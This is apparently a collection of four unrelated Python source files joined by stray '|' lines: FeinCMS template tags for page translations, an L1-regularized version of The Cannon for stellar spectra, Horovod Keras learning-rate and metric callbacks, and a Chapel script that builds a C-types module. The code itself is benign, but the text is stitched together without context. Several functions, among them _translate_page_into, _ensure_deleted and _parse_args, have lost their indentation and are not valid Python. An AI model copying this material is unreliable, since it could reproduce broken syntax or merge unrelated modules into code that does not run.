    def what(self, page, args):
        only_existing = args.get('existing', False)
        exclude_current = args.get('excludecurrent', False)

        # Preserve the trailing path when switching languages if extra_path
        # exists (this is mostly the case when we are working inside an
        # ApplicationContent-managed page subtree)
        trailing_path = u''
        request = args.get('request', None)
        if request:
            # Trailing path without first slash
            # NOTE(review): assumes request._feincms_extra_context is set
            # whenever a request is passed in -- confirm with callers.
            trailing_path = request._feincms_extra_context.get('extra_path', '')[1:]

        translations = dict((t.language, t) for t in page.available_translations())
        # The page itself counts as the translation for its own language.
        translations[page.language] = page

        links = []

        for key, name in settings.LANGUAGES:
            if exclude_current and key == page.language:
                continue

            # hardcoded paths... bleh
            if key in translations:
                links.append((key, name, translations[key].get_absolute_url()+trailing_path))
            elif not only_existing:
                # No translation for this language: emit it with a None URL.
                links.append((key, name, None))

        return links
register.tag('feincms_languagelinks', do_simple_assignment_node_with_var_and_args_helper(LanguageLinksNode))
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------
def _translate_page_into(page, language, default=None):
"""
Return the translation for a given page
"""
# Optimisation shortcut: No need to dive into translations if page already what we want
if page.language == language:
return page
translations = dict((t.language, t) for t in page.available_translations())
translations[page.language] = page
if language in translations:
return translations[language]
else:
if hasattr(default, '__call__'):
return default(page=page)
return default
# ------------------------------------------------------------------------
class TranslatedPageNode(SimpleAssignmentNodeWithVarAndArgs):
    """
    ::

        {% feincms_translatedpage for feincms_page as feincms_transpage language=en %}
        {% feincms_translatedpage for feincms_page as originalpage %}
        {% feincms_translatedpage for some_page as translatedpage language=feincms_page.language %}

    This template tag needs the translations extension.

    Returns the requested translation of the page if it exists. If the language
    argument is omitted the primary language will be returned (the first language
    specified in settings.LANGUAGES).

    Note: To distinguish between a bare language code and a variable we check whether
    settings LANGUAGES contains that code -- so naming a variable "en" will probably
    not do what is intended.
    """

    def what(self, page, args, default=None):
        language = args.get('language', False)
        if not language:
            # No language given: use the primary (first configured) language.
            language = settings.LANGUAGES[0][0]
        else:
            known_codes = [code for code, _name in settings.LANGUAGES]
            if language not in known_codes:
                # Not a known code -- treat it as a template variable.
                language = template.Variable(language).resolve(self.render_context)
        return _translate_page_into(page, language, default=default)
register.tag('feincms_translatedpage', do_simple_assignment_node_with_var_and_args_helper(TranslatedPageNode))
# ------------------------------------------------------------------------
class TranslatedPageNodeOrBase(TranslatedPageNode):
    """TranslatedPageNode that falls back to the page's original translation."""

    def what(self, page, args):
        return super(TranslatedPageNodeOrBase, self).what(
            page, args, default=page.get_original_translation)
register.tag('feincms_translatedpage_or_base', do_simple_assignment_node_with_var_and_args_helper(TranslatedPageNodeOrBase))
# ------------------------------------------------------------------------
@register.filter
def feincms_translated_or_base(pages, language=None):
    """Yield each page translated into ``language``, or its base translation."""
    if not hasattr(pages, '__iter__'):
        # Accept a single page as well as an iterable of pages.
        pages = [pages]
    for page in pages:
        yield _translate_page_into(
            page, language, default=page.get_original_translation)
# ------------------------------------------------------------------------
@register.inclusion_tag("breadcrumbs.html")
def feincms_breadcrumbs(page, include_self=True):
    """
    Generate a list of the page's ancestors suitable for use as breadcrumb navigation.

    By default, generates an unordered list with the id "breadcrumbs" -
    override breadcrumbs.html to change this.

    ::

        {% feincms_breadcrumbs feincms_page %}
    """
    if not page or not isinstance(page, Page):
        raise ValueError("feincms_breadcrumbs must be called with a valid Page object")

    trail = [
        (ancestor.get_absolute_url(), ancestor.short_title())
        for ancestor in page.get_ancestors()
    ]
    if include_self:
        # Current page goes last, without a link.
        trail.append((None, page.short_title()))
    return {"trail": trail}
# ------------------------------------------------------------------------
@register.filter
def is_parent_of(page1, page2):
    """
    Determines whether a given page is the parent of another page

    Example::

        {% if page|is_parent_of:feincms_page %} ... {% endif %}
    """
    try:
        same_tree = page1.tree_id == page2.tree_id
        # In mptt, an ancestor's left/right values strictly bracket those
        # of its descendants.
        return same_tree and page1.lft < page2.lft and page1.rght > page2.rght
    except AttributeError:
        return False
# ------------------------------------------------------------------------
@register.filter
def is_equal_or_parent_of(page1, page2):
    """
    Determines whether a page equals, or is an ancestor of, another page
    (its mptt left/right values bracket -- or equal -- the other's).
    """
    try:
        return page1.tree_id == page2.tree_id and page1.lft <= page2.lft and page1.rght >= page2.rght
    except AttributeError:
        return False
# ------------------------------------------------------------------------
@register.filter
def is_sibling_of(page1, page2):
    """
    Determines whether a given page is a sibling of another page

    ::

        {% if page|is_sibling_of:feincms_page %} ... {% endif %}
    """
    try:
        siblings = page1.parent_id == page2.parent_id
    except AttributeError:
        # Non-page values can never be siblings.
        return False
    return siblings
# ------------------------------------------------------------------------
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A regularized (compressed sensing) version of The Cannon.
"""
from __future__ import (division, print_function, absolute_import,
unicode_literals)
__all__ = ["L1RegularizedCannonModel"]
import logging
import numpy as np
import scipy.optimize as op
from . import (cannon, utils)
# Module-level logger named after this module.
logger = logging.getLogger(__name__)
class L1RegularizedCannonModel(cannon.CannonModel):
    """
    A L1-regularized edition of The Cannon model for the estimation of arbitrary
    stellar labels.

    :param labelled_set:
        A set of labelled objects. The most common input form is a table with
        columns as labels, and stars/objects as rows.

    :type labelled_set:
        :class:`~astropy.table.Table`, numpy structured array

    :param normalized_flux:
        An array of normalized fluxes for stars in the labelled set, given as
        shape `(num_stars, num_pixels)`. The `num_stars` should match the number
        of rows in `labelled_set`.

    :type normalized_flux:
        :class:`np.ndarray`

    :param normalized_ivar:
        An array of inverse variances on the normalized fluxes for stars in the
        labelled set. The shape of the `normalized_ivar` array should match that
        of `normalized_flux`.

    :type normalized_ivar:
        :class:`np.ndarray`

    :param dispersion: [optional]
        The dispersion values corresponding to the given pixels. If provided,
        this should have length `num_pixels`.

    :param threads: [optional]
        Specify the number of parallel threads to use. If `threads > 1`, the
        training and prediction phases will be automagically parallelised.

    :param pool: [optional]
        Specify an optional multiprocessing pool to map jobs onto.
        This argument is only used if specified and if `threads > 1`.
    """

    # Attributes that describe the model (serialized alongside it).
    _descriptive_attributes \
        = ["_dispersion", "_vectorizer", "_censors", "_regularization"]

    def __init__(self, *args, **kwargs):
        super(L1RegularizedCannonModel, self).__init__(*args, **kwargs)

    @property
    def regularization(self):
        """
        Return the regularization term for this model.
        """
        return self._regularization

    @regularization.setter
    def regularization(self, regularization):
        """
        Specify the regularization term for the model, either as a single value
        or a per-pixel value.

        :param regularization:
            The L1-regularization term for the model.

        :raises ValueError:
            If the term is negative, non-finite, or sized to neither one
            value nor one value per pixel.
        """
        if regularization is None:
            self._regularization = None
            return None

        regularization = np.array(regularization).flatten()
        if regularization.size == 1:
            # Broadcast a scalar term to one value per pixel.
            regularization = np.ones_like(self.dispersion) * regularization[0]
        elif regularization.size != len(self.dispersion):
            raise ValueError("regularization must be a positive value or "
                             "an array of positive values for each pixel "
                             "({0} != {1})".format(regularization.size,
                                                   len(self.dispersion)))

        # Vectorized numpy reductions instead of the builtin any(), which
        # would iterate the array element-by-element in Python.
        if np.any(regularization < 0) \
        or not np.all(np.isfinite(regularization)):
            raise ValueError("regularization terms must be "
                             "positive and finite")
        self._regularization = regularization
        return None

    def train(self, fixed_scatter=True, **kwargs):
        """
        Train the model based on the labelled set using the given vectorizer.

        :param fixed_scatter: [optional]
            Fix the scatter terms and do not solve for them during the training
            phase. If set to `True`, the `s2` attribute must be already set.
        """
        kwds = {
            "fixed_scatter": fixed_scatter,
            "function": _fit_regularized_pixel,
            "additional_args": [self.regularization, ]
        }
        # Caller-supplied keywords override the defaults above.
        kwds.update(kwargs)
        super(L1RegularizedCannonModel, self).train(**kwds)

    def check(self):
        # Smoke-test hook; prints only.
        print("Let's rock!")
def chi_sq(theta, design_matrix, data, ivar, axis=None, gradient=True):
    """
    Calculate the chi-squared difference between the spectral model and data.

    Returns the (optionally per-axis) chi-squared value and, unless
    ``gradient`` is False, its analytic derivative with respect to theta.
    """
    residuals = np.dot(theta, design_matrix.T) - data

    value = np.sum(ivar * residuals**2, axis=axis)
    if gradient:
        derivative = 2.0 * np.dot(design_matrix.T, ivar * residuals)
        return (value, derivative)
    return value
def L1Norm(Q):
    """
    Return the L1 norm of Q together with its (sub-)derivative, sign(Q).

    :param Q:
        An array of finite values.
    """
    norm = np.sum(np.abs(Q))
    return (norm, np.sign(Q))
def _objective_function_for_a_regularized_pixel_with_fixed_scatter(theta,
        normalized_flux, adjusted_ivar, regularization, design_matrix,
        gradient=True):
    """
    Objective function for one regularized pixel with fixed scatter:
    chi-squared plus an L1 penalty on all theta coefficients but the first.

    :param theta:
        The theta parameters to solve for.

    :param normalized_flux:
        Normalized flux values for a single pixel across many stars.

    :param adjusted_ivar:
        Inverse variance of the normalized fluxes for the pixel, with the
        scatter term already folded in.

    :param regularization:
        Scale factor applied to the L1 norm of theta.

    :param design_matrix:
        The design matrix for the model.

    :param gradient: [optional]
        Also return the analytic derivative of the objective function.
    """
    csq, d_csq = chi_sq(theta, design_matrix, normalized_flux, adjusted_ivar)
    L1, d_L1 = L1Norm(theta)

    # Variation of the L1 norm that ignores the first coefficient.
    # NOTE(review): the gradient below still includes d_L1[0] even though
    # the objective excludes |theta[0]| -- presumably accepted behaviour;
    # confirm before relying on exact gradients at index 0.
    L1 = L1 - np.abs(theta[0])

    objective = csq + regularization * L1
    if gradient:
        return (objective, d_csq + regularization * d_L1)
    return objective
def _fit_regularized_pixel(initial_theta, initial_s2, normalized_flux,
        normalized_ivar, censoring_mask, regularization, design_matrix,
        fixed_scatter, **kwargs):
    """
    Fit the theta coefficients for a single regularized pixel.

    :param initial_theta:
        The initial theta coefficients, or None to derive a starting point.
    :param initial_s2:
        The (fixed) scatter term s^2 for this pixel.
    :param normalized_flux:
        The normalized flux values for this pixel across many stars.
    :param normalized_ivar:
        The inverse variances of the normalized flux values.
    :param censoring_mask:
        Boolean mask selecting the design matrix columns used by this pixel.
    :param regularization:
        The regularization strength scaling the L1 norm of theta.
    :param design_matrix:
        The (possibly packed) design matrix for the model.
    :param fixed_scatter:
        Keep the scatter fixed at `initial_s2`. Only True is implemented.
    :returns:
        A two-length tuple of the de-censored optimized parameters and a
        metadata dictionary describing the optimization.
    """
    # Any actual information in these pixels?
    if np.sum(normalized_ivar) < 1. * normalized_ivar.size: # MAGIC
        fiducial_theta = np.hstack([1, np.zeros(censoring_mask.size - 1)])
        metadata = { "message": "No pixel information." }
        return (np.hstack([fiducial_theta, np.inf]), metadata)

    # Unpack (and mask) the design matrix.
    design_matrix = utils._unpack_value(design_matrix)[:, censoring_mask]

    # Set up the objective function and its arguments.
    if fixed_scatter:
        func = _objective_function_for_a_regularized_pixel_with_fixed_scatter
        adjusted_ivar = normalized_ivar/(1. + normalized_ivar * initial_s2)
        args = (
            normalized_flux,
            adjusted_ivar,
            regularization,
            design_matrix
        )
    else:
        # BUG FIX: this previously did `raise WTF`, which produced a
        # NameError on an undefined name. Raise a meaningful exception for
        # the unimplemented free-scatter mode instead.
        raise NotImplementedError(
            "simultaneous fitting of theta and scatter is not implemented; "
            "use fixed_scatter=True")

    # Set up the initial theta value.
    if initial_theta is None:
        initial_theta, _, __ = cannon._fit_theta(
            normalized_flux, normalized_ivar, initial_s2, design_matrix)

    # If the initial_theta is the same size as the censored_mask, but different
    # to the design_matrix, then we need to censor the initial theta.
    if initial_theta.size == censoring_mask.size \
    and initial_theta.size != censoring_mask.sum():
        # Censor the initial theta.
        # Note: the fiducial theta (below) will have the correct size because
        # the design matrix is already censored.
        initial_theta = initial_theta[censoring_mask]

    # Is the fiducial theta a better starting point?
    fiducial_theta = np.hstack([1, np.zeros(design_matrix.shape[1] - 1)])
    if func(fiducial_theta, *args)[0] < func(initial_theta, *args)[0]:
        initial_theta = fiducial_theta

    # Starting point for optimization.
    p0 = np.array(initial_theta) if fixed_scatter \
        else np.hstack([initial_theta, initial_s2])

    # Prepare keywords for optimization.
    kwds = {
        "args": args,
        "disp": False,
        "maxfun": np.inf,
        "maxiter": np.inf,
    }
    # Keywords specific to BFGS (and default values).
    bfgs_terms = {
        "m": p0.size,
        "factr": 10.0,
        "pgtol": 1e-6,
    }
    bfgs_terms.update(kwargs.pop("op_bfgs_kwargs", {}))
    kwds.update(bfgs_terms)
    logger.debug("BFGS keywords: {}".format(kwds))
    op_params, fopt, d = op.fmin_l_bfgs_b(
        func, p0, fprime=None, approx_grad=False, **kwds)
    metadata = {
        "bfgs_fopt": fopt,
        "bfgs_dict": d
    }
    if d["warnflag"] > 0:
        # BFGS stopped prematurely; run Powell's method instead.
        # Default values:
        kwds.update({
            "xtol": 1e-6,
            "ftol": 1e-6
        })
        kwds.update(kwargs.get("op_fmin_kwargs", {}))
        # Powell's method does not accept the BFGS-specific keywords.
        for k in bfgs_terms:
            del kwds[k]
        # Add 'False' to args so that we don't return gradient because fmin
        # does not want it.
        kwds["args"] = tuple(list(kwds["args"]) + [False])
        logger.debug("fmin_powell keywords: {}".format(kwds))
        op_params, fopt, direc, n_iter, n_funcs, warnflag = op.fmin_powell(
            func, op_params, full_output=True, **kwds)
        if warnflag > 0:
            logger.warning("""
            BFGS stopped prematurely:
            {0}
            And then Powell optimization failed:
            {1}
            """.format(d["task"], [
                "MAXIMUM NUMBER OF FUNCTION EVALUATIONS.",
                "MAXIMUM NUMBER OF ITERATIONS."
            ][warnflag - 1]))
        metadata.update({
            "fmin_fopt": fopt,
            "fmin_niter": n_iter,
            "fmin_nfuncs": n_funcs,
            "fmin_warnflag": warnflag
        })

    # De-censor the optimized parameters!
    labels = np.zeros(censoring_mask.size)
    labels[censoring_mask] = op_params
    result = np.hstack([labels, initial_s2]) if fixed_scatter else labels
    return (result, metadata)
|
|
import keras
import keras.backend as K
import tensorflow as tf
import horovod.tensorflow as hvd
class BroadcastGlobalVariablesCallback(keras.callbacks.Callback):
    """
    Keras Callback that broadcasts all global variables from the root rank
    to every other process when training begins.
    Consistent initialization of all workers is required whether training
    starts from random weights or from a restored checkpoint.
    """

    def __init__(self, root_rank, device=''):
        """
        Construct a new BroadcastGlobalVariablesCallback.
        Args:
            root_rank: Rank that will send data, other ranks will receive data.
            device: Device to be used for broadcasting. Uses GPU by default
                    if Horovod was build with HOROVOD_GPU_BROADCAST.
        """
        super(BroadcastGlobalVariablesCallback, self).__init__()
        self.root_rank = root_rank
        self.device = device

    def on_train_begin(self, logs=None):
        # Pin the broadcast op to the configured device and run it once,
        # before any training step executes.
        with tf.device(self.device):
            broadcast_op = hvd.broadcast_global_variables(self.root_rank)
            K.get_session().run(broadcast_op)
class MetricAverageCallback(keras.callbacks.Callback):
    """
    Keras Callback that averages metrics across all processes at the
    end of the epoch. Useful in conjuction with ReduceLROnPlateau,
    TensorBoard and other metrics-based callbacks.
    Note: This callback must be added to the callback list before the
    ReduceLROnPlateau, TensorBoard or other metrics-based callbacks.
    """

    def __init__(self, device=''):
        """
        Construct a new MetricAverageCallback.
        Args:
            device: Device to be used for allreduce. Uses GPU by default
                    if Horovod was build with HOROVOD_GPU_ALLREDUCE.
        """
        super(MetricAverageCallback, self).__init__()
        # Persistent TF variable and allreduce op per metric name, reused
        # across epochs to avoid rebuilding graph nodes.
        self.variables = {}
        self.allreduce_ops = {}
        self.device = device

    def _make_variable(self, metric, value):
        # Create an initialized variable holding the metric value, plus the
        # allreduce op that averages it across all workers.
        with tf.name_scope('MetricAverageCallback'):
            var = tf.Variable(value, name=metric)
            K.get_session().run(var.initializer)
            allreduce_op = hvd.allreduce(var, device_dense=self.device)
            return var, allreduce_op

    def _average_metrics_in_place(self, logs):
        logs = logs or {}
        averaged = {}
        # Reduce every metric among workers; the names are sorted so all
        # processes execute the allreduces in the same order.
        for name in sorted(logs):
            current = logs[name]
            if name in self.variables:
                K.set_value(self.variables[name], current)
            else:
                self.variables[name], self.allreduce_ops[name] = \
                    self._make_variable(name, current)
            averaged[name] = K.get_session().run(self.allreduce_ops[name])
        # Write the reduced values back into the logs dictionary so later
        # callbacks observe the averaged metrics.
        for name, value in averaged.items():
            logs[name] = value

    def on_epoch_end(self, epoch, logs=None):
        self._average_metrics_in_place(logs)
class LearningRateScheduleCallback(keras.callbacks.Callback):
    """
    LearningRateScheduleCallback sets learning rate between epochs `start_epoch` and
    `end_epoch` to be `initial_lr * multiplier`. `multiplier` can be a constant or
    a function `f(epoch) = lr'`.
    If `multiplier` is a function and `staircase=True`, learning rate adjustment will
    happen at the beginning of each epoch and the epoch passed to the `multiplier`
    function will be an integer.
    If `multiplier` is a function and `staircase=False`, learning rate adjustment will
    happen at the beginning of each batch and the epoch passed to the `multiplier`
    function will be a floating number: `epoch' = epoch + batch / steps_per_epoch`.
    This functionality is useful for smooth learning rate adjustment schedulers, such
    as `LearningRateWarmupCallback`.
    `initial_lr` is the learning rate of the model optimizer at the start of the training.
    """

    def __init__(self, multiplier, start_epoch=0, end_epoch=None, staircase=True,
                 momentum_correction=True, steps_per_epoch=None):
        """
        Construct a new LearningRateScheduleCallback.
        Args:
            multiplier: A constant multiplier or a function `f(epoch) = lr'`
            start_epoch: The first epoch this adjustment will be applied to. Defaults to 0.
            end_epoch: The epoch this adjustment will stop applying (exclusive end).
                       Defaults to None.
            staircase: Whether to adjust learning rate at the start of epoch (`staircase=True`)
                       or at the start of every batch (`staircase=False`).
            momentum_correction: Apply momentum correction to optimizers that have momentum.
                                 Defaults to True.
            steps_per_epoch: The callback will attempt to autodetect number of batches per
                             epoch with Keras >= 2.0.0. Provide this value if you have an older
                             version of Keras.
        """
        super(LearningRateScheduleCallback, self).__init__()
        self.start_epoch = start_epoch
        self.end_epoch = end_epoch
        self.staircase = staircase
        self.momentum_correction = momentum_correction
        # Learning rate read from the optimizer when training begins; all
        # adjustments are expressed relative to this value.
        self.initial_lr = None
        # Momentum value to restore at the end of the current batch; set by
        # _adjust_learning_rate when momentum correction is applied.
        self.restore_momentum = None
        self.steps_per_epoch = steps_per_epoch
        # Set by on_epoch_begin; used to compute fractional epochs per batch.
        self.current_epoch = None
        if not callable(multiplier):
            # A constant multiplier cannot vary within an epoch, so force the
            # per-epoch (staircase) schedule and wrap the constant in a
            # function for a uniform interface.
            self.staircase = True
            self.multiplier = lambda epoch: multiplier
        else:
            self.multiplier = multiplier

    def _autodetect_steps_per_epoch(self):
        if self.params.get('steps'):
            # The number of steps is provided in the parameters.
            return self.params['steps']
        elif self.params.get('samples') and self.params.get('batch_size'):
            # Compute the number of steps per epoch using # of samples and a batch size.
            return self.params['samples'] // self.params['batch_size']
        else:
            raise ValueError('Could not autodetect the number of steps per epoch. '
                             'Please specify the steps_per_epoch parameter to the '
                             '%s() or upgrade to the latest version of Keras.'
                             % self.__class__.__name__)

    def _adjust_learning_rate(self, epoch):
        old_lr = K.get_value(self.model.optimizer.lr)
        new_lr = self.initial_lr * self.multiplier(epoch)
        K.set_value(self.model.optimizer.lr, new_lr)

        if hasattr(self.model.optimizer, 'momentum') and self.momentum_correction:
            # See the paper cited above for more information about momentum correction.
            # Save the original momentum so on_batch_end can restore it.
            self.restore_momentum = K.get_value(self.model.optimizer.momentum)
            K.set_value(self.model.optimizer.momentum,
                        self.restore_momentum * new_lr / old_lr)

    def _restore_momentum_if_needed(self):
        if self.restore_momentum:
            K.set_value(self.model.optimizer.momentum, self.restore_momentum)
            self.restore_momentum = None

    def on_train_begin(self, logs=None):
        # Capture the baseline learning rate before any adjustment is made.
        self.initial_lr = K.get_value(self.model.optimizer.lr)
        if not self.staircase and not self.steps_per_epoch:
            self.steps_per_epoch = self._autodetect_steps_per_epoch()

    def on_epoch_begin(self, epoch, logs=None):
        self.current_epoch = epoch

    def on_batch_begin(self, batch, logs=None):
        if (self.current_epoch < self.start_epoch or
                (self.end_epoch is not None and self.current_epoch >= self.end_epoch)):
            # Outside of the adjustment scope.
            return

        if self.staircase and batch == 0:
            # Do on first batch of every epoch.
            self._adjust_learning_rate(self.current_epoch)
        elif not self.staircase:
            # Pass a fractional epoch so smooth schedules adjust per batch.
            epoch = self.current_epoch + float(batch) / self.steps_per_epoch
            self._adjust_learning_rate(epoch)

    def on_batch_end(self, batch, logs=None):
        # Undo the per-batch momentum correction applied in on_batch_begin.
        self._restore_momentum_if_needed()

    def on_epoch_end(self, epoch, logs=None):
        if logs is not None:
            # Log current learning rate.
            logs['lr'] = K.get_value(self.model.optimizer.lr)
class LearningRateWarmupCallback(LearningRateScheduleCallback):
    """
    Implements gradual learning rate warmup:
        `lr = initial_lr / hvd.size()` ---> `lr = initial_lr`
    `initial_lr` is the learning rate of the model optimizer at the start of the training.
    This technique was described in the paper "Accurate, Large Minibatch SGD: Training
    ImageNet in 1 Hour". See https://arxiv.org/pdf/1706.02677.pdf for details.
    Math recap:
                                               batch
        epoch             = full_epochs + ---------------
                                          steps_per_epoch
                             lr     size - 1
        lr'(epoch)        = ---- * (-------- * epoch + 1)
                            size     warmup
                             lr
        lr'(epoch = 0)    = ----
                            size
        lr'(epoch = warmup) = lr
    """

    def __init__(self, warmup_epochs=5, momentum_correction=True, steps_per_epoch=None,
                 verbose=0):
        """
        Construct a new LearningRateWarmupCallback that will gradually warm up the learning rate.
        Args:
            warmup_epochs: The number of epochs of the warmup phase. Defaults to 5.
            momentum_correction: Apply momentum correction to optimizers that have momentum.
                                 Defaults to True.
            steps_per_epoch: The callback will attempt to autodetect number of batches per
                             epoch with Keras >= 2.0.0. Provide this value if you have an older
                             version of Keras.
            verbose: verbosity mode, 0 or 1.
        """
        def multiplier(epoch):
            # Adjust epoch to produce round numbers at the end of each epoch, so that TensorBoard
            # learning rate graphs look better.
            # Note: reads self.steps_per_epoch lazily, so autodetection in
            # on_train_begin has already happened by the time this runs.
            epoch += 1. / self.steps_per_epoch
            return 1. / hvd.size() * (epoch * (hvd.size() - 1) / warmup_epochs + 1)
        self.verbose = verbose
        super(LearningRateWarmupCallback, self).__init__(
            multiplier, start_epoch=0, end_epoch=warmup_epochs, staircase=False,
            momentum_correction=momentum_correction, steps_per_epoch=steps_per_epoch)

    def on_epoch_end(self, epoch, logs=None):
        super(LearningRateWarmupCallback, self).on_epoch_end(epoch, logs)

        # Announce completion once, at the end of the final warmup epoch.
        if epoch == self.end_epoch - 1 and self.verbose > 0:
            new_lr = K.get_value(self.model.optimizer.lr)
            print('\nEpoch %d: finished gradual learning rate warmup to %g.' %
                  (epoch + 1, new_lr))
|
|
#!/usr/bin/env python
"""Build SysCTypes.chpl module.
Determines the size of various C types (e.g. long, size_t, etc) and creates a
Chapel module with 'extern types' declaration so Chapel code can refer to the
types.
Specify the output file as a positional argument, e.g.:
%prog path/to/SysCTypes.chpl
"""
from __future__ import print_function
import contextlib
import logging
import optparse
import os
import os.path
import re
import sys
# List of C types. The items in each element are:
#
# * C macro for maximum value for type
# * Name of Chapel type
# * Name of C type
_types = [
    ('INT_MAX', 'c_int', 'int'),
    ('UINT_MAX', 'c_uint', 'uint'),
    ('LONG_MAX', 'c_long', 'long'),
    ('ULONG_MAX', 'c_ulong', 'unsigned long'),
    ('LLONG_MAX', 'c_longlong', 'long long'),
    ('ULLONG_MAX', 'c_ulonglong', 'unsigned long long'),
    ('CHAR_MAX', 'c_char', 'char'),
    ('SCHAR_MAX', 'c_schar', 'signed char'),
    ('UCHAR_MAX', 'c_uchar', 'unsigned char'),
    ('SHRT_MAX', 'c_short', 'short'),
    ('USHRT_MAX', 'c_ushort', 'unsigned short'),
    ('INTPTR_MAX', 'c_intptr', 'intptr_t'),
    ('UINTPTR_MAX', 'c_uintptr', 'uintptr_t'),
    ('PTRDIFF_MAX', 'c_ptrdiff', 'ptrdiff_t'),
    ('SSIZE_MAX', 'ssize_t', 'ssize_t'),
    ('SIZE_MAX', 'size_t', 'size_t'),
]

# Map of max values to chapel types.
_max_value_to_chpl_type = {
    '127': 'int(8)',
    '255': 'uint(8)',
    '32767': 'int(16)',
    '65535': 'uint(16)',
    '2147483647': 'int(32)',
    '4294967295': 'uint(32)',
    '9223372036854775807': 'int(64)',
    '18446744073709551615': 'uint(64)',
}

# Skeleton of the temporary header handed to the C preprocessor. The
# FIND_INT_SIZES_START token marks where the expanded *_MAX macro values
# begin in the preprocessor output (see get_sys_c_types).
_h_file_header = """
#include "sys_basic.h"
#include <limits.h>
#include <stdint.h>
#include <math.h>
FIND_INT_SIZES_START
"""
def main():
    """Entry point: parse arguments and write the generated module to the
    requested output file."""
    args = _parse_args()
    _setup_logging(args.verbose)

    # Build the module text up front, since generation can error/exit early
    # if something goes wrong; only then touch the output file.
    content = get_sys_c_types(args.doc)
    with open(args.output_file, 'w') as out_fp:
        out_fp.write(content)
        out_fp.write('\n')
    logging.debug('Wrote module to: {0}'.format(args.output_file))
def get_sys_c_types(docs=False):
    """Returns a string with the SysCTypes.chpl module content.

    :type docs: bool
    :arg docs: When True, emit 'integral' instead of the concrete Chapel
        type for each declaration (used when building for chpldoc).
    """
    # Find the $CHPL_HOME/util/config/ dir.
    util_cfg_dir = os.path.abspath(os.path.dirname(__file__))
    logging.debug('Util config dir: {0}'.format(util_cfg_dir))

    # Get the C compile line.
    compileline_cmd = os.path.join(util_cfg_dir, 'compileline')
    cmd = '{compileline_cmd} --compile'.format(**locals())
    compileline = os.popen(cmd).read().strip()
    logging.debug('Compile line: {0}'.format(compileline))

    # Create temp header file with *_MAX macros, then run it through the C
    # preprocessor using the C compile line found above.
    h_file = 'find_int_sizes_tmp.h'
    with _ensure_deleted(h_file):
        logging.debug('Creating temp header: {0}'.format(h_file))
        with open(h_file, 'w') as fp:
            fp.write(_h_file_header)
            for max_macro, _, _ in _types:
                fp.write('{0}\n'.format(max_macro))
        logging.debug('Wrote {0} max types to {1}'.format(len(_types), h_file))

        compile_cmd = '{compileline} -E {h_file}'.format(**locals())
        logging.debug('Preprocessor command: {0}'.format(compile_cmd))
        compile_result = os.popen(compile_cmd).read()
        logging.debug('Captured preprocessor output with {0} '
                      'characters.'.format(len(compile_result)))

    # Iterate through the preprocessor output, find the max value expressions,
    # and record them in a list.
    max_exprs = []
    keep = False
    for line in compile_result.splitlines():
        # Skip lines until the start macro is found.
        if not keep and 'FIND_INT_SIZES_START' not in line:
            continue
        # Found the start of the max macros. All subsequent lines will be
        # recorded.
        elif 'FIND_INT_SIZES_START' in line:
            keep = True
        # Ignore lines starting with # since they could be #line
        # type directives.
        elif line.strip().startswith("#"):
            continue
        # Ignore blank lines
        elif line.strip() == '':
            continue
        # The start of the max macros has already been found. Record every
        # line, stripping it of whitespace.
        else:
            max_exprs.append(line.strip())
    logging.debug('Found {0} lines of max type '
                  'values.'.format(len(max_exprs)))
    if len(max_exprs) != len(_types):
        logging.error('Found {0} max values, but {1} types were '
                      'expected.'.format(len(max_exprs), len(_types)))
        sys.exit(1)

    # Iterate through the max value expressions, evaluate each one, and store
    # it in a list. Python deals with arbitrarily large integers, so there is
    # no fear of overflow.
    replace_pattern = re.compile(r'[UL]', re.IGNORECASE)
    max_values = []
    for expr in max_exprs:
        # Strip integer-literal suffixes (U/L/UL/LL, ...) so eval sees a
        # plain Python integer expression.
        ex = re.sub(replace_pattern, '', expr)
        # NOTE(review): eval() of preprocessor output - input comes from the
        # local C compiler, not from users, so this is trusted here.
        value = eval(ex)
        logging.debug('{0} -> {1}'.format(expr, value))
        max_values.append(value)
    logging.debug('Evaluated all {0} expressions from '
                  'preprocessor.'.format(len(max_values)))

    # Iterate through the chapel types/max values and print out the SysCTypes
    # Chapel module code. Each line takes the form "extern type <chpl_type>=
    # <chpl_value>;" where <chpl_value> is found by looking up the max value
    # (from evaluated expression above) in the _max_value_to_chpl_type map.
    sys_c_types = []
    handled_c_ptr = False
    for i, max_value in enumerate(max_values):
        max_macro, chpl_type, c_type = _types[i]
        chpl_value = _max_value_to_chpl_type.get(str(max_value))
        if chpl_value is None:
            logging.error('Unknown numeric limit {0} in '
                          '_max_value_to_chpl_type dict.'.format(max_value))
            sys.exit(1)
        sys_c_types.append('/* The type corresponding to the C {c_type} type'
                           ' */'.format(**locals()))
        stmt = 'extern type {chpl_type}= '.format(**locals())
        if docs:
            stmt += 'integral'
        else:
            stmt += chpl_value
        stmt += ';'
        sys_c_types.append(stmt)
        if chpl_type == 'c_ptr':
            handled_c_ptr = True
    # NOTE(review): _types contains no 'c_ptr' entry, so handled_c_ptr is
    # always False and c_void_ptr is always emitted - confirm intended.
    if not handled_c_ptr:
        sys_c_types.append('extern type c_void_ptr; '
                           '// opaque; no ptr arithmetic in Chapel code!')

    # Finally, print out set of asserts for module. They assert that the
    # sizeof(<extern chpl type>) matches the sizeof(<chpl type>). E.g.
    #
    #   assert(sizeof(c_int) == sizeof(int(32)));
    #
    sys_c_types.append("""
{
pragma "no prototype"
extern proc sizeof(type t): size_t;
""")
    for i, max_value in enumerate(max_values):
        _, chpl_type, _ = _types[i]
        chpl_value = _max_value_to_chpl_type.get(str(max_value))
        sys_c_types.append(' assert(sizeof({chpl_type}) == sizeof({chpl_value}))'
                           ';'.format(**locals()))
    sys_c_types.append('}')

    return '\n'.join(sys_c_types)
@contextlib.contextmanager
def _ensure_deleted(filename):
"""Ensure file is deleted after context manager."""
try:
yield
finally:
if os.path.exists(filename):
logging.debug('Deleting: {0}'.format(filename))
os.unlink(filename)
def _parse_args():
"""Parse and return command line args."""
class NoWrapHelpFormatter(optparse.IndentedHelpFormatter):
"""Help formatter that does not wrap the description text."""
def _format_text(self, text):
return text
parser = optparse.OptionParser(
usage='usage: %prog [--doc] [--verbose] <SysCTypes_filename>',
description=__doc__,
formatter=NoWrapHelpFormatter()
)
parser.add_option(
'-v', '--verbose', action='store_true',
help='Enable verbose output.'
)
parser.add_option(
'--doc', action='store_true',
help='Build SysCTypes module for chpldoc.'
)
opts, args = parser.parse_args()
if len(args) != 1:
parser.print_help()
sys.exit(1)
else:
opts.output_file = args[0]
return opts
def _setup_logging(verbose=False):
"""Initialize logging and set level based on verbose.
:type verbose: bool
